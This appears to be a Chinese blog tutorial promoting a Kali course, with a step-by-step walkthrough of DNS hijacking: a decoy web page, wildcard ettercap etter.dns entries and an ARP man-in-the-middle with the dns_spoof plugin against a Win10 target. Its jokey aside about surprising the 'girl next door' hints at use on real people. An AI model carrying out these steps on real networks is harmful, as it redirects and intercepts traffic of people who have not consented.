网站首页 > 基础教程 正文
谁说没有黑客没有浪漫?先听首BGM膨胀下。。。
DNS域名攻击
在我的视频专栏课程《白帽黑客kali渗透指南》,我已经深入浅出地讲解了ARP缓存攻击,使用我们的kali就能充当中间人,全面截获目标主机和互联网之间的流量数据,上网内容和图片也是一览无遗!想想也是细思极恐,这里重申一下,仅仅用作安全测试,切勿用于不当目的!
还没有学习ARP攻击的小白,可以点击下方《白帽黑客kali渗透指南》的专栏卡片进入。
ARP既然这么厉害,那DNS又是何物?DNS其实和ARP是类似的。
ARP协议指的是主机ip地址和MAC地址的关系,需要确定IP地址和MAC进行对应才能完成指定通信;而DNS顾名思义就是指DNS域名和IP的关系,将你访问的域名(www。baidu。com)通过域名解析服务器(又叫DNS域名解析服务器)将这个域名进行解析(先在本地域名解析服务器缓存中寻找该域名对应的IP地址,没有发现,就会去互联网的域名解析服务器查找,直到成功!),此时会解析成一个固定的真实的ip地址,然后实现双向通信。
你想一下,如果此时有恶意攻击者(我们的kali)充当中间人,在网段中进行广播,将自己伪装成一个本地域名解析服务器,然后把kali的ip和所有域名进行绑定,这就是实打实的DNS域名劫持攻击!
实战演示DNS域名劫持
- 首先要在kali本地的web根目录下制作一张山寨的冒牌网页(不然人家访问个啥?)
在kali的文本编辑器中输入以下代码:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/heml; charset=utf-8">
<title>I love you</title>
<meta name="keywords" content="test">
<meta name="description" content="test website">
</head>
<body>
<h1>不好意思,我爱你,所以黑了你</h1>
<a target="-blank" title="I LOVE YOU"><img src="./biaobai.png"></a>
<embed src="./biaobai.wav" autostart="true" loop="true" hidden="true"></embed>
</body>
<footer>
<p>来自隔壁小哥哥的爱</p>
</footer>
</html>
上图大概内容:这是一个html的网页,放置一张告白图片,添加一段音乐。
然后保存在主目录下!然后你将制作好的图片和音乐文件也要放在主目录下,如下图:
然后你要将这个index.html文件、以及代码中涉及到的图片biaobai.png、音乐资源文件biaobai.wav都要拷贝到kali的/var/www/html下,也是kali web服务器的apache2根目录。
- 开启apache2网页服务
Kali终端下输入:
su,进入root用户
service apache2 start
- 开启DNS欺骗—ettercap
首先配置ettercap的dns域名解析文件
在kali终端中输入:
vim /etc/ettercap/etter.dns
然后进入编辑界面:
后面添加:
* A 192.168.31.206 (这是你kali的IP)
* PTR 192.168.31.206
注意:* 代表所有的域名
如图所示即可!添加这两行即可!
保存退出vim编辑!已经完成ettercap的dns攻击配置!
- 开始攻击:
Kali终端下输入:
Ettercap -G
配置ettercap
设置插件:dns_spoof
扫描主机列表hosts-scan for hosts
设置目标1网关ip 192.168.31.1
设置目标2ip 192.168.31.6
设置ARP中间人
访问百度,复现DNS域名攻击
我们接下来模拟靶机win10通过浏览器来上网,比如浏览百度的首页:
在win10的浏览器下输入:www,baidu,com回车!
好无情,我们看到的不再是百度首页,而是我们kali web根目录下的表白网页,还自带"夜空最闪亮的星"!你说隔壁妹妹会不会惊喜?还是破口大骂"渣男!"?
小白嘿客我想说
想学习更多白帽黑客kali渗透技术的小白,点击小白都能学的kali渗透实战就能加入学习!
关注我,你能学到更多,给个赞,评论吧!
- 上一篇: SEO优化_站内代码标签优化建议
- 下一篇: 为什么你的网页需要CSP?
猜你喜欢
- 2024-11-25 网站复制粘贴收费怎么办
- 2024-11-25 SEO前端meta标示优化
- 2024-11-25 给web页面添加甘特图,只需三条命令!
- 2024-11-25 初识meta标签与SEO——零基础自学网页制作
- 2024-11-25 彻底禁止查看网页源代码及破解
- 2024-11-25 国产化操作系统浏览器自定义协议
- 2024-11-25 Electron 进程间通信的四种方式
- 2024-11-25 PHP页面跳转
- 2024-11-25 如何实现公司各个系统之间的账号互通和SSO统一登陆
- 2024-11-25 10分钟学会用Python抓取电影排行榜
- 最近发表
- 标签列表
-
- gitpush (61)
- pythonif (68)
- location.href (57)
- tail-f (57)
- pythonifelse (59)
- deletesql (62)
- c++模板 (62)
- css3动画 (57)
- c#event (59)
- linuxgzip (68)
- 字符串连接 (73)
- nginx配置文件详解 (61)
- html标签 (69)
- c++初始化列表 (64)
- exec命令 (59)
- canvasfilltext (58)
- mysqlinnodbmyisam区别 (63)
- arraylistadd (66)
- node教程 (59)
- console.table (62)
- c++time_t (58)
- phpcookie (58)
- mysqldatesub函数 (63)
- window10java环境变量设置 (66)
- c++虚函数和纯虚函数的区别 (66)